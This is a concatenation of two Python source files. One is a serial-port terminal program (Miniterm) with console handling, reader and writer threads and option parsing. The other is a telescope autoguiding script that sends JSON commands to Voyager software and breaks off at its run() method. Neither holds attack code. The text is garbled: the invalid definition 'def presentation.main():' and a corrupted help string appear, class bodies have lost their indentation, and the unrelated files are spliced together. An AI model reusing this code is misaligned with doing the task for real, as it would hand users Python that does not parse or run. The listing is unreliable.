--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % bindings
if sys.version_info >= (3, 0):
    # Python 3: serial reads return bytes; decode a single byte to a
    # one-character str (latin1 maps byte values 0-255 one-to-one).
    def character(b):
        return b.decode('latin1')
else:
    # Python 2: reads already return str, so pass through unchanged.
    def character(b):
        return b
# Single-byte constants used for newline translation and key handling below.
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
# Prefix bytes produced by msvcrt.getch() for function/extended keys, which
# the Windows console reader ignores.
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
    import msvcrt
    # Windows console: msvcrt already provides unbuffered single-key reads,
    # so setup/cleanup are no-ops.
    class Console(object):
        def __init__(self):
            pass
        def setup(self):
            pass # Do nothing for 'nt'
        def cleanup(self):
            pass # Do nothing for 'nt'
        def getkey(self):
            while True:
                z = msvcrt.getch()
                if z == X00 or z == X0E: # functions keys, ignore
                    msvcrt.getch()
                else:
                    # Translate the Enter key (CR) to LF for the writer loop.
                    if z == CR:
                        return LF
                    return z
    console = Console()
elif os.name == 'posix':
    import termios, sys, os
    # POSIX console: switch the tty to raw-ish mode (no canonical buffering,
    # no echo, no signal keys) and restore the saved attributes on cleanup.
    class Console(object):
        def __init__(self):
            self.fd = sys.stdin.fileno()
            self.old = None
        def setup(self):
            self.old = termios.tcgetattr(self.fd)
            new = termios.tcgetattr(self.fd)
            new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
            # Return each read as soon as one byte is available.
            new[6][termios.VMIN] = 1
            new[6][termios.VTIME] = 0
            termios.tcsetattr(self.fd, termios.TCSANOW, new)
        def getkey(self):
            c = os.read(self.fd, 1)
            return c
        def cleanup(self):
            # Only restore if setup() ran and saved the previous attributes.
            if self.old is not None:
                termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
    console = Console()
    def cleanup_console():
        console.cleanup()
    # NOTE(review): sys.exitfunc is Python 2 only; Python 3 would need
    # atexit.register instead.
    sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
    raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
    """Write the list of detected serial ports to stderr, if enumerable."""
    # comports is None when serial.tools.list_ports failed to import.
    if not comports:
        return
    sys.stderr.write('\n--- Available ports:\n')
    for port, desc, hwid in sorted(comports()):
        sys.stderr.write('--- %-20s %s\n' % (port, desc))
# Outgoing newline modes; each value indexes NEWLINE_CONVERISON_MAP/LF_MODES.
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
# Display modes for received data, cycled via the menu.
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
    def _stop_reader(self):
        """Stop reader thread only, wait for clean exit of thread"""
        # The reader loop also checks self.alive; clearing only this flag
        # stops reading without shutting down the writer.
        self._reader_alive = False
        self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
    def stop(self):
        """Signal both worker loops to exit (threads are joined in join())."""
        self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
    def reader(self):
        """loop and copy serial->console

        Runs until stop() or _stop_reader() clears the corresponding flag.
        Output format depends on self.repr_mode (see REPR_MODES).
        """
        try:
            while self.alive and self._reader_alive:
                # read(1) with the port's 1s timeout; may return '' on timeout.
                data = character(self.serial.read(1))
                if self.repr_mode == 0:
                    # direct output, just have to care about newline setting
                    if data == '\r' and self.convert_outgoing == CONVERT_CR:
                        sys.stdout.write('\n')
                    else:
                        sys.stdout.write(data)
                elif self.repr_mode == 1:
                    # escape non-printable, let pass newlines
                    if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
                        if data == '\n':
                            sys.stdout.write('\n')
                        elif data == '\r':
                            # CR of a CRLF pair: swallowed, LF prints newline
                            pass
                    elif data == '\n' and self.convert_outgoing == CONVERT_LF:
                        sys.stdout.write('\n')
                    elif data == '\r' and self.convert_outgoing == CONVERT_CR:
                        sys.stdout.write('\n')
                    else:
                        # repr(...)[1:-1] strips the surrounding quotes
                        sys.stdout.write(repr(data)[1:-1])
                elif self.repr_mode == 2:
                    # escape all non-printable, including newline
                    sys.stdout.write(repr(data)[1:-1])
                elif self.repr_mode == 3:
                    # escape everything (hexdump)
                    # NOTE(review): str.encode('hex') is Python 2 only.
                    for c in data:
                        sys.stdout.write("%s " % c.encode('hex'))
                sys.stdout.flush()
        # NOTE(review): Python 2-only except syntax; py3 needs "as e".
        except serial.SerialException, e:
            self.alive = False
            # would be nice if the console reader could be interruptted at this
            # point...
            raise
def writer(self):
    """\
    Loop and copy console->serial until EXITCHARCTER character is
    found. When MENUCHARACTER is found, interpret the next key
    locally.

    Runs in its own thread.  Menu handling is a two-key protocol: the
    menu character arms ``menu_active`` and the *next* key selects the
    action (file upload, port/baud/parity changes, line toggles, ...).
    """
    menu_active = False
    try:
        while self.alive:
            try:
                b = console.getkey()
            except KeyboardInterrupt:
                # map console ctrl+c onto a raw 0x03 byte
                b = serial.to_bytes([3])
            c = character(b)
            if menu_active:
                if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
                    self.serial.write(b)                    # send character
                    if self.echo:
                        sys.stdout.write(c)
                elif c == '\x15':                       # CTRL+U -> upload file
                    sys.stderr.write('\n--- File to upload: ')
                    sys.stderr.flush()
                    console.cleanup()
                    filename = sys.stdin.readline().rstrip('\r\n')
                    if filename:
                        try:
                            # NOTE(review): handle shadows the `file` builtin and
                            # is never closed -- leaks on every upload
                            file = open(filename, 'r')
                            sys.stderr.write('--- Sending file %s ---\n' % filename)
                            while True:
                                line = file.readline().rstrip('\r\n')
                                # NOTE(review): a blank line stops the upload,
                                # not just EOF -- confirm this is intended
                                if not line:
                                    break
                                self.serial.write(line)
                                self.serial.write('\r\n')
                                # Wait for output buffer to drain.
                                self.serial.flush()
                                sys.stderr.write('.')   # Progress indicator.
                            sys.stderr.write('\n--- File %s sent ---\n' % filename)
                        except IOError, e:
                            sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
                    console.setup()
                elif c in '\x08hH?':                    # CTRL+H, h, H, ? -> Show help
                    sys.stderr.write(get_help_text())
                elif c == '\x12':                       # CTRL+R -> Toggle RTS
                    self.rts_state = not self.rts_state
                    self.serial.setRTS(self.rts_state)
                    sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
                elif c == '\x04':                       # CTRL+D -> Toggle DTR
                    self.dtr_state = not self.dtr_state
                    self.serial.setDTR(self.dtr_state)
                    sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
                elif c == '\x02':                       # CTRL+B -> toggle BREAK condition
                    self.break_state = not self.break_state
                    self.serial.setBreak(self.break_state)
                    sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
                elif c == '\x05':                       # CTRL+E -> toggle local echo
                    self.echo = not self.echo
                    sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
                elif c == '\x09':                       # CTRL+I -> info
                    self.dump_port_settings()
                elif c == '\x01':                       # CTRL+A -> cycle escape mode
                    self.repr_mode += 1
                    if self.repr_mode > 3:
                        self.repr_mode = 0
                    sys.stderr.write('--- escape data: %s ---\n' % (
                        REPR_MODES[self.repr_mode],
                    ))
                elif c == '\x0c':                       # CTRL+L -> cycle linefeed mode
                    self.convert_outgoing += 1
                    if self.convert_outgoing > 2:
                        self.convert_outgoing = 0
                    self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
                    sys.stderr.write('--- line feed %s ---\n' % (
                        LF_MODES[self.convert_outgoing],
                    ))
                elif c in 'pP':                         # P -> change port
                    dump_port_list()
                    sys.stderr.write('--- Enter port name: ')
                    sys.stderr.flush()
                    console.cleanup()
                    try:
                        port = sys.stdin.readline().strip()
                    except KeyboardInterrupt:
                        port = None
                    console.setup()
                    if port and port != self.serial.port:
                        # reader thread needs to be shut down
                        self._stop_reader()
                        # save settings
                        settings = self.serial.getSettingsDict()
                        try:
                            try:
                                new_serial = serial.serial_for_url(port, do_not_open=True)
                            except AttributeError:
                                # happens when the installed pyserial is older than 2.5. use the
                                # Serial class directly then.
                                new_serial = serial.Serial()
                                new_serial.port = port
                            # restore settings and open
                            new_serial.applySettingsDict(settings)
                            new_serial.open()
                            new_serial.setRTS(self.rts_state)
                            new_serial.setDTR(self.dtr_state)
                            new_serial.setBreak(self.break_state)
                        except Exception, e:
                            sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
                            new_serial.close()
                        else:
                            # swap in the new port only after it opened cleanly
                            self.serial.close()
                            self.serial = new_serial
                            sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
                        # and restart the reader thread
                        self._start_reader()
                elif c in 'bB':                         # B -> change baudrate
                    sys.stderr.write('\n--- Baudrate: ')
                    sys.stderr.flush()
                    console.cleanup()
                    backup = self.serial.baudrate
                    try:
                        self.serial.baudrate = int(sys.stdin.readline().strip())
                    except ValueError, e:
                        # restore the previous baudrate on bad input
                        sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
                        self.serial.baudrate = backup
                    else:
                        self.dump_port_settings()
                    console.setup()
                elif c == '8':                          # 8 -> change to 8 bits
                    self.serial.bytesize = serial.EIGHTBITS
                    self.dump_port_settings()
                elif c == '7':                          # 7 -> change to 7 bits
                    self.serial.bytesize = serial.SEVENBITS
                    self.dump_port_settings()
                elif c in 'eE':                         # E -> change to even parity
                    self.serial.parity = serial.PARITY_EVEN
                    self.dump_port_settings()
                elif c in 'oO':                         # O -> change to odd parity
                    self.serial.parity = serial.PARITY_ODD
                    self.dump_port_settings()
                elif c in 'mM':                         # M -> change to mark parity
                    self.serial.parity = serial.PARITY_MARK
                    self.dump_port_settings()
                elif c in 'sS':                         # S -> change to space parity
                    self.serial.parity = serial.PARITY_SPACE
                    self.dump_port_settings()
                elif c in 'nN':                         # N -> change to no parity
                    self.serial.parity = serial.PARITY_NONE
                    self.dump_port_settings()
                elif c == '1':                          # 1 -> change to 1 stop bits
                    self.serial.stopbits = serial.STOPBITS_ONE
                    self.dump_port_settings()
                elif c == '2':                          # 2 -> change to 2 stop bits
                    self.serial.stopbits = serial.STOPBITS_TWO
                    self.dump_port_settings()
                elif c == '3':                          # 3 -> change to 1.5 stop bits
                    self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
                    self.dump_port_settings()
                elif c in 'xX':                         # X -> change software flow control
                    # uppercase enables, lowercase disables
                    self.serial.xonxoff = (c == 'X')
                    self.dump_port_settings()
                elif c in 'rR':                         # R -> change hardware flow control
                    self.serial.rtscts = (c == 'R')
                    self.dump_port_settings()
                else:
                    sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
                # one menu action per menu character
                menu_active = False
            elif c == MENUCHARACTER: # next char will be for menu
                menu_active = True
            elif c == EXITCHARCTER:
                self.stop()
                break                                   # exit app
            elif c == '\n':
                self.serial.write(self.newline)         # send newline character(s)
                if self.echo:
                    sys.stdout.write(c)                 # local echo is a real newline in any case
                    sys.stdout.flush()
            else:
                self.serial.write(b)                    # send byte
                if self.echo:
                    sys.stdout.write(c)
                    sys.stdout.flush()
    except:
        self.alive = False
        raise
def presentation.main():
import optparse
parser = optparse.OptionParser(
usage = "%prog [options] [port [baudrate]]",
description = "Miniterm - A simple terminal program for the serial port."
)
group = optparse.OptionGroup(parser, "Port settings")
group.add_option("-p", "--port",
dest = "port",
help = "port, a number or a presentation.device name. (deprecated option, use parameter instead)",
default = DEFAULT_PORT
)
group.add_option("-b", "--baud",
dest = "baudrate",
action = "store",
type = 'int',
help = "set baud rate, default %default",
default = DEFAULT_BAUDRATE
)
group.add_option("--parity",
dest = "parity",
action = "store",
help = "set parity, one of [N, E, O, S, M], default=N",
default = 'N'
)
group.add_option("--rtscts",
dest = "rtscts",
action = "store_true",
help = "enable RTS/CTS flow control (default off)",
default = False
)
group.add_option("--xonxoff",
dest = "xonxoff",
action = "store_true",
help = "enable software flow control (default off)",
default = False
)
group.add_option("--rts",
dest = "rts_state",
action = "store",
type = 'int',
help = "set initial RTS line state (possible values: 0, 1)",
default = DEFAULT_RTS
)
group.add_option("--dtr",
dest = "dtr_state",
action = "store",
type = 'int',
help = "set initial DTR line state (possible values: 0, 1)",
default = DEFAULT_DTR
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Data handling")
group.add_option("-e", "--echo",
dest = "echo",
action = "store_true",
help = "enable local echo (default off)",
default = False
)
group.add_option("--cr",
dest = "cr",
action = "store_true",
help = "do not send CR+LF, send CR only",
default = False
)
group.add_option("--lf",
dest = "lf",
action = "store_true",
help = "do not send CR+LF, send LF only",
default = False
)
group.add_option("-D", "--debug",
dest = "repr_mode",
action = "count",
help = """debug received data (escape non-printable chars)
--debug can be given multiple times:
0: just print what is received
1: escape non-printable characters, do newlines as unusual
2: escape non-printable characters, newlines too
3: hex dump everything""",
default = 0
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Hotkeys")
group.add_option("--exit-char",
dest = "exit_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to exit the application",
default = 0x1d
)
group.add_option("--menu-char",
dest = "menu_char",
action = "store",
type = 'int',
help = "ASCII code of special character that is used to control miniterm (menu)",
default = 0x14
)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Diagnostics")
group.add_option("-q", "--quiet",
dest = "quiet",
action = "store_true",
help = "suppress non-error messages",
default = False
)
parser.add_option_group(group)
(options, args) = parser.parse_args()
options.parity = options.parity.upper()
if options.parity not in 'NEOSM':
parser.error("invalid parity")
if options.cr and options.lf:
parser.error("only one of --cr or --lf can be specified")
if options.menu_char == options.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
global EXITCHARCTER, MENUCHARACTER
EXITCHARCTER = chr(options.exit_char)
MENUCHARACTER = chr(options.menu_char)
port = options.port
baudrate = options.baudrate
if args:
if options.port is not None:
parser.error("no arguments are allowed, options only when --port is given")
port = args.pop(0)
if args:
try:
baudrate = int(args[0])
except ValueError:
parser.error("baud rate must be a number, not %r" % args[0])
args.pop(0)
if args:
parser.error("too many arguments")
else:
# noport given on command line -> ask user now
if port is None:
dump_port_list()
port = raw_input('Enter port name:')
convert_outgoing = CONVERT_CRLF
if options.cr:
convert_outgoing = CONVERT_CR
elif options.lf:
convert_outgoing = CONVERT_LF
try:
miniterm = Miniterm(
port,
baudrate,
options.parity,
rtscts=options.rtscts,
xonxoff=options.xonxoff,
echo=options.echo,
convert_outgoing=convert_outgoing,
repr_mode=options.repr_mode,
)
except serial.SerialException, e:
sys.stderr.write("could not open port %r: %s\n" % (port, e))
sys.exit(1)
if not options.quiet:
sys.stderr.write('--- Miniterm on %s: %d,%s,%s,%s ---\n' % (
miniterm.serial.portstr,
miniterm.serial.baudrate,
miniterm.serial.bytesize,
miniterm.serial.parity,
miniterm.serial.stopbits,
))
sys.stderr.write('--- Quit: %s | Menu: %s | Help: %s followed by %s ---\n' % (
key_description(EXITCHARCTER),
key_description(MENUCHARACTER),
key_description(MENUCHARACTER),
key_description('\x08'),
))
if options.dtr_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing DTR %s\n' % (options.dtr_state and 'active' or 'inactive'))
miniterm.serial.setDTR(options.dtr_state)
miniterm.dtr_state = options.dtr_state
if options.rts_state is not None:
if not options.quiet:
sys.stderr.write('--- forcing RTS %s\n' % (options.rts_state and 'active' or 'inactive'))
miniterm.serial.setRTS(options.rts_state)
miniterm.rts_state = options.rts_state
console.setup()
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not options.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
#~ console.cleanup()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
presentation.main()
|
voyager_donuts.py | """
Test script for guiding Voyager with donuts
"""
import sys
import socket as s
import traceback
import time
import threading
import logging
import queue
import json
import uuid
import signal
import argparse as ap
from datetime import datetime
from shutil import copyfile
from collections import defaultdict
import numpy as np
from astropy.io import fits
from donuts import Donuts
import voyager_utils as vutils
import voyager_db as vdb
from PID import PID
# TODO: Add RemoteActionAbort call when things go horribly wrong
# pylint: disable=line-too-long
# pylint: disable=invalid-name
# pylint: disable=logging-fstring-interpolation
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
# pylint: disable=too-many-nested-blocks
# pylint: disable=too-many-lines
# pylint: disable=too-many-instance-attributes
# pylint: disable=broad-except
def arg_parse():
    """
    Collect and return the parsed command line arguments.
    """
    parser = ap.ArgumentParser()
    parser.add_argument('config',
                        help='path to config file')
    return parser.parse_args()
# set this when ctrl+c happens, then exit cleanly
# (checked by the main run loop and the guide loop before each iteration)
EXIT_EVENT = threading.Event()
class DonutsStatus():
    """
    Current status of Donuts guiding.

    Enum-like integer constants; code elsewhere only ever compares
    against these with ``==``.
    """
    # plain ints (previously np.arange(4)) -- numpy scalars are
    # unnecessary for simple constants and compare identically
    CALIBRATING, GUIDING, IDLE, UNKNOWN = range(4)
class Message():
    """
    Factory helpers for Voyager's two-way JSON commands.

    The integer class attributes are flags to compare against the
    ActionResultInt values Voyager reports back in RemoteActionResult
    responses.
    """
    NEED_INIT = 0
    READY = 1
    RUNNING = 2
    PAUSE = 3
    OK = 4
    FINISHED_ERROR = 5
    ABORTING = 6
    ABORTED = 7
    TIMEOUT = 8
    TIME_END = 9
    OK_PARTIAL = 10

    @staticmethod
    def pulse_guide(uid, idd, direction, duration):
        """
        Build a RemotePulseGuide command.

        The usual "all went well" response code is 4 (``Message.OK``).

        Parameters
        ----------
        uid : string
            unique ID for this command
        idd : int
            unique ID for this command
        direction : dict
            X and Y directional information for a correction
        duration : dict
            X and Y pulse guide durations for a correction

        Returns
        -------
        message : dict
            JSON-dumps-ready dict for a pulse guide command

        Raises
        ------
        None
        """
        params = {"UID": uid,
                  "Direction": direction,
                  "Duration": duration,
                  "Parallelized": "true"}
        return {"method": "RemotePulseGuide",
                "params": params,
                "id": idd}

    @staticmethod
    def camera_shot(uid, idd, exptime, save_file, filename):
        """
        Build a RemoteCameraShot command for taking a CCD image.

        The usual "all went well" response code is 4 (``Message.OK``).

        Parameters
        ----------
        uid : string
            unique ID for this command
        idd : int
            unique ID for this command
        exptime : int
            exposure time of the image to be taken
        save_file : boolean
            flag to save the file or not
        filename : string
            path to the file for saving

        Returns
        -------
        message : dict
            JSON-dumps-ready dict for a camera shot command

        Raises
        ------
        None
        """
        params = {"UID": uid,
                  "Expo": exptime,
                  "Bin": 1,
                  "IsROI": "false",
                  "ROITYPE": 0,
                  "ROIX": 0,
                  "ROIY": 0,
                  "ROIDX": 0,
                  "ROIDY": 0,
                  "FilterIndex": 3,
                  "ExpoType": 0,
                  "SpeedIndex": 0,
                  "ReadoutIndex": 0,
                  # Voyager expects JSON booleans as lowercase strings
                  "IsSaveFile": str(save_file).lower(),
                  "FitFileName": filename,
                  "Gain": 1,
                  "Offset": 0,
                  "Parallelized": "true"}
        return {"method": "RemoteCameraShot",
                "params": params,
                "id": idd}

    @staticmethod
    def goto_radec(uid, idd, ra, dec):
        """
        Build a RemotePrecisePointTarget command to repoint the telescope.

        Parameters
        ----------
        uid : string
            unique ID for this command
        idd : int
            unique ID for this command
        ra : string
            RA of the target field (HH MM SS.ss)
        dec : string
            DEC of the target field (DD MM SS.ss)

        Returns
        -------
        message : dict
            JSON-dumps-ready dict for a precise pointing command

        Raises
        ------
        None
        """
        # text coordinates are used, so the numeric RA/DEC slots are 0
        params = {"UID": uid,
                  "IsText": "true",
                  "RA": 0,
                  "DEC": 0,
                  "RAText": ra,
                  "DECText": dec,
                  "Parallelized": "true"}
        return {"method": "RemotePrecisePointTarget",
                "params": params,
                "id": idd}
class Response():
    """
    Track the pair of acknowledgements (UID-keyed and id-keyed)
    expected for each outstanding two-way command sent to Voyager.
    """
    def __init__(self, uid, idd, ok_status):
        """
        Initialise response object.

        Parameters
        ----------
        uid : string
            unique ID for this command
        idd : int
            unique ID for this command
        ok_status : int
            command return value that we search for to ensure
            everything went ok; any other value means there was
            an error
        """
        self.uid = uid
        self.idd = idd
        self.ok_status = ok_status
        # nothing received yet
        self.uid_recv = False
        self.idd_recv = False
        self.uid_status = None
        self.idd_status = None

    def uid_received(self, status):
        """
        Mark the UID acknowledgement as received.

        Parameters
        ----------
        status : int
            response code to command for given uid
        """
        self.uid_status = status
        self.uid_recv = True

    def idd_received(self, status):
        """
        Mark the id acknowledgement as received.

        Parameters
        ----------
        status : int
            response code to command for given idd
        """
        self.idd_status = status
        self.idd_recv = True

    def all_ok(self):
        """
        Check whether both acknowledgements arrived with the expected
        codes (the idd code is hardcoded to 0, the uid code is the
        ok_status supplied on init).

        Returns
        -------
        all_ok : boolean
            Did we get a good response for the command submitted?
        """
        if not (self.uid_recv and self.idd_recv):
            return False
        return self.uid_status == self.ok_status and self.idd_status == 0
class Voyager():
"""
Voyager interaction class
"""
def __init__(self, config):
    """
    Initialise the Voyager autoguiding class instance.

    Pure configuration wiring: copies settings out of *config*,
    initialises internal state and primes the guide buffer and PID
    loop.  No I/O happens here; the socket is opened in run().

    Parameters
    ----------
    config : dict
        Configuration information

    Raises
    ------
    KeyError
        if a required configuration key is missing
    """
    # socket is created lazily in __open_socket()
    self.socket = None
    self.socket_ip = config['socket_ip']
    self.socket_port = config['socket_port']
    self.host = config['host']
    self.inst = 1
    self.image_extension = config['image_extension']
    # Fits image path keyword (key Voyager uses to report image paths)
    self._voyager_path_keyword = "FITPathAndName"
    # events that only carry information; run() just logs them
    self._INFO_SIGNALS = ["Polling", "Version", "Signal", "NewFITReady"]
    # set up important image header keywords
    self.filter_keyword = config['filter_keyword']
    self.field_keyword = config['field_keyword']
    self.ra_keyword = config['ra_keyword']
    self.dec_keyword = config['dec_keyword']
    self.xbin_keyword = config['xbin_keyword']
    self.ybin_keyword = config['ybin_keyword']
    self.ra_axis = config['ra_axis']
    # decimal-degrees declination of the current frame, set per image
    self._declination = None
    # keep track of current status
    self._status = DonutsStatus.UNKNOWN
    # add a message object for sharing between methods
    self._msg = Message()
    # create an overflow for message receiving, not sure if needed, but added just in case
    self.message_overflow = []
    # some internal tracking variables
    self._image_id = 0
    self._comms_id = 0
    # timestamp of the last successful send; used to decide when to poll
    self._last_poll_time = None
    # set up the guiding thread
    self._latest_guide_frame = None
    self._guide_condition = threading.Condition()
    # set up a queue to send back results from guide_loop
    # (maxsize=1: one correction per frame, consumed by run())
    self._results_queue = queue.Queue(maxsize=1)
    # set up some root directory info for host and container
    self.calibration_root = config['calibration_root']
    self.reference_root = config['reference_root']
    self.data_root = config['data_root']
    self.calibration_root_host = config['calibration_root_host']
    self.reference_root_host = config['reference_root_host']
    self.data_root_host = config['data_root_host']
    # this calibration directory inside calibration root gets made if we calibrate
    self._calibration_dir = None
    self._calibration_results_path = None
    self.calibration_step_size_ms = config['calibration_step_size_ms']
    self.calibration_n_iterations = config['calibration_n_iterations']
    self.calibration_exptime = config['calibration_exptime']
    # set up objects to hold calibration info
    self._direction_store = None
    self._scale_store = None
    # add some places to keep track of reference images change overs
    self._ref_file = None
    self._last_field = None
    self._last_filter = None
    self._last_xbin = None
    self._last_ybin = None
    self._donuts_ref = None
    # set up the PID loop coeffs etc
    self.pid_x_p = config["pid_coeffs"]["x"]["p"]
    self.pid_x_i = config["pid_coeffs"]["x"]["i"]
    self.pid_x_d = config["pid_coeffs"]["x"]["d"]
    self.pid_x_setpoint = config["pid_coeffs"]["set_x"]
    self.pid_y_p = config["pid_coeffs"]["y"]["p"]
    self.pid_y_i = config["pid_coeffs"]["y"]["i"]
    self.pid_y_d = config["pid_coeffs"]["y"]["d"]
    self.pid_y_setpoint = config["pid_coeffs"]["set_y"]
    # placeholders for actual PID objects
    self._pid_x = None
    self._pid_y = None
    # ag correction buffers - used for outlier rejection
    self.guide_buffer_length = config["guide_buffer_length"]
    self.guide_buffer_sigma = config["guide_buffer_sigma"]
    self._buff_x = None
    self._buff_y = None
    self._buff_x_sigma = None
    self._buff_y_sigma = None
    # set up max error in pixels
    self.max_error_pixels = config['max_error_pixels']
    # set up stabilisation
    self._stabilised = False
    # set up how many attempts to stabilise are allowed
    self.n_images_to_stabilise = config['n_images_to_stabilise']
    # initialise stabilisation counter
    self._images_to_stabilise = self.n_images_to_stabilise
    # calibrated pixels to time ratios and the directions
    self.pixels_to_time = config['pixels_to_time']
    self.guide_directions = config['guide_directions']
    # initialise all the things
    self.__initialise_guide_buffer()
    # start with the guider unstabilised
    self.__initialise_pid_loop(stabilised=False)
    # some donuts algorithm config
    self.donuts_subtract_bkg = config['donuts_subtract_bkg']
def __resolve_host_path(self, data_type, path):
    """
    Take in a path from Voyager which is absolute on
    the container. We need a path to the volume on the
    host instead.

    Data are mounted to self.data_root_host
    Refs are mounted to self.reference_root_host
    Donuts calibs are mounted to self.calibration_root_host

    Parameters
    ----------
    data_type : string
        which type of data are we working with?
        data, calib or references?
    path : string
        container (posix style) path to image

    Returns
    -------
    host_path : string
        the same image as seen from the host
        (backslash separated, so presumably a Windows host)

    Raises
    ------
    None
    """
    # fetch the image name from the full (posix) path
    filename = path.split('/')[-1]
    # data and calibration trees are partitioned by night
    night = vutils.get_tonight()
    # BUG FIX: filename was computed but never used -- the paths were
    # built with a literal placeholder instead of the image name
    if data_type == "data":
        host_path = f"{self.data_root_host}\\{night}\\{filename}"
    elif data_type == "calib":
        host_path = f"{self.calibration_root_host}\\{night}\\{filename}"
    else:
        # reference images live directly under the reference root
        host_path = f"{self.reference_root_host}\\{filename}"
    return host_path
def __resolve_container_path(self, data_type, path):
    """
    Take in a path from Voyager which is absolute on
    the host machine. We need a path to the volume inside
    the Docker container.

    Data are mounted to self.data_root
    Refs are mounted to self.reference_root
    Donuts calibs are mounted to self.calibration_root

    Parameters
    ----------
    data_type : string
        which type of data are we working with?
        data, calib or references?
    path : string
        host (backslash separated) path to image

    Returns
    -------
    cont_path : string
        the same image as seen from inside the container

    Raises
    ------
    None
    """
    # fetch the image name from the full (Windows style) path
    filename = path.split('\\')[-1]
    # data and calibration trees are partitioned by night
    night = vutils.get_tonight()
    # BUG FIX: filename was computed but never used -- the paths were
    # built with a literal placeholder instead of the image name
    if data_type == "data":
        cont_path = f"{self.data_root}/{night}/{filename}"
    elif data_type == "calib":
        cont_path = f"{self.calibration_root}/{night}/{filename}"
    else:
        # reference images live directly under the reference root
        cont_path = f"{self.reference_root}/{filename}"
    return cont_path
def run(self):
    """
    Open a connection and maintain it with Voyager.
    Listen to autoguiding and calibration jobs.
    Dispatch them and continue listening until
    told to abort.

    Parameters
    ----------
    None

    Returns
    -------
    None

    Raises
    ------
    None
    """
    # spawn the guide calculation thread
